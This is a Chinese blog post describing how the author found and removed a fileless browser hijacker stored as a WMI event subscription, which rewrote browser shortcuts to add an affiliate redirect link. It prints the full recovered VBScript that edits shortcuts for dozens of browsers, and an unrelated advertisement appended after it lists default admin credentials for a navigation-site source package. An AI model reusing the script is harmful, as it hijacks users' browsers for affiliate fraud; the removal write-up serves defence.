“http://hao643.com/?r=wwwww&m=c166” 类似这样的恶意链接去除方法

网络中游荡,不经意间就被感染,感染后不痛但是让人瘙痒烦躁。

首先说明出现的问题,发现电脑每次开机、不定时(也许这个病毒设置的就是定时,没有具体统计)的出现 谷歌浏览器、ie浏览器 的快捷方式被修改,我修改和还原后没用,不躲久就又加上恶意网址链接了。我已经把注册表、各种浏览器的的主页都更改了,没用。恶意修改后如下:

eg:"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://hao643.com/?r=wwwww&m=c166 

这是我的谷歌浏览器被恶意更改后,后果是,每次打开都会跳到 https://www.hao123.com/?tn=97175858_hao_pg,分析这个网址,前面 https://www.hao123.com/,hao123是一个上网导航(Directindustry Web Guide),百度旗下 “核心” 产品。后面的 ?tn=97175858_hao_pg ,tn(是technology的缩写么?)等号的后面的数字是推广员的推广编号 97175858,_hao_pg :这个大概表示的就是 “hao” 下的 pg(大概是page的意思),所以说你访问了这个网址,就会给这个推广员赚钱。

对了,还有开头的 http://hao643.com/?r=wwwww&m=c166  ,这个网址就是一个跳板,每次访问他都会跳到  https://www.hao123.com/?tn=97175858_hao_pg ,暂且留坑,以后搞明白了利弊再分析。

如果你出现了类似的问题,并且检查过注册表、更改了浏览器的主页、杀毒软件查杀过全部系统,但还是没有效果。不用担心,我现在就有一个妙方。

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装,

http://www.cr173.com/soft/88291.html

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\CIMV2” (我的是默认出现的,如果这个不行,可以试试填入“root\subscription”),确定,出现下图:


Filters 下,也许每个人的情况会不同,但是关键是在右面右键点击 ActiveScript... ,选择view instance properties ,会出现:


就是这里,ScriptText里面,有Value,我这个感染的代码是:

On Error Resume Next:Const link = "http://hao643.com/?r=wwwww&m=c166":Const link360 = "http://hao643.com/?r=wwwww&m=c166&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\lenovo\Desktop,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:


查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中),靠~!

受到影响的浏览器有(各色浏览器,差不多齐了):
"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"


最后,清除方法:在 WMI event viewer中将“ _EventFilter:Name="unown_filter" ”项目右键删除!

删不掉?

到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools )下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!

暂时就这么多了,还有没有其它影响的话,用用再看吧!

嗯,好歹这苍蝇到底还是吐出去了!


参考自:http://blog.sina.com.cn/s/blog_8627ac3c010195ri.html




精仿hao123网址导航系统简介: 1.本程序为asp+access数据库,所有代码开源,无绑定域名等限制,直接把源码放在win系统服务器即可。 2.常规管理--网站基本参数(可视模式) 进去可以进行修改编辑,可视化操作更方便更简单。 3.静态页面管理-静态页面生成-一键生成所有静态页面,后台地址/admin/目录, 4.qq登录在根目录/Api_qqlogin/config.inc.asp 5.logo替换位置:template/skin19_4_20100527_2/images/logo.png 6.前台网址、统计代码等全部在位置:19模板功能管理--模块分布图 源码特色: 1、集成手机版、电影、头条、新闻、娱乐等信息自动更新同步信息源 2、流量来路交换链功能! 更加准确的加密算法记录来路,有站点点入即可在有效位置推荐站长站点,非常实用的流量交换功能。 3、宣传得积分、积分兑换奖品功能! 结合WEB2.0的元素,注册用户可以通过宣传来获取积分,积分可以换取相应的奖品,大大增加网站的粘合度,从而更加有利于网站的推广服务! 4、历史记录、在线网络收藏夹功能! 对已访问过的网址会本地自动记录,可以在线收藏自己爱好的网址,分类收藏,排序收藏等一系列完整的网络收藏夹功能。 5、模板标签化 程序与模板分离! 前台模版与后台程序完全分离,简单实用的标签调用,可以自己独立制作模板,非常简单实用的标签,子类可以单独设置模板,制作出属于自己的个性网址导航。 6、后台集成各大搜索引擎联盟账号! 百度、淘宝、迅雷、搜狗、谷歌、狗狗、当当、卓越等联盟帐号的集成,增加隐性的收入,你只要去申请一个他们联盟的帐号,然后在后台添加帐号即可,马上用户在使用您的网站搜索时即可产生效益! 新增360联盟 详细说明: 1、首页风格图:支持换肤 2、图片广告后台可自行设置10个,用户打开前台时会自动轮播 3、后台可自行设置默认颜色风格,换肤功能中的皮肤可后台一键升级,以满足不同节假 日换肤之用 4、后台可自行添加新闻、军事、体育、八卦新闻,默认会自动更新 5、前台支持多搜索引擎切换,后台可设置默认搜索引擎 6、后台可设置所有网址的小图标,前台会自动兼容小图标 7、前台已经内置多个内页的子频道,比如: 新闻频道,影视频道, 电视剧频道, 购物频道, 团购频道, 笑话频道, 小游戏频道, 彩票频道, 快递频道,手机频道, 旅游频道, 军事频道, 股票频道, 音乐频道, 小说频道, 天气频道, 违章查询等频道,并在不断增加中,上线后,还将不断完善! 8、前台所有网址,所有网址类别,所有工具箱,菜单都可以后台自行修改 9、支持QQ登陆,支持ucenter账号互通 10、支持积分系统,包括下线推广,绑定首页积分,注册,登陆积分 11、支持收藏夹,网址观看历史记录功能 12、支持流量交互功。后台自己设置流量按几比几返还,集成流量交互系统,让你的导航导航程序与众不同,点入大于点出,网站自动套红,防作弊,三次验证,精确统计能 13、支持网址批量入库功能。 注意:本源码已经修复首页天气预报显示非法盗用等问题 后台地址 /adminn/login.asp 帐号 admin 密码 admin888
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

或许,这就是梦想吧!

如果对你有用,欢迎打赏。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值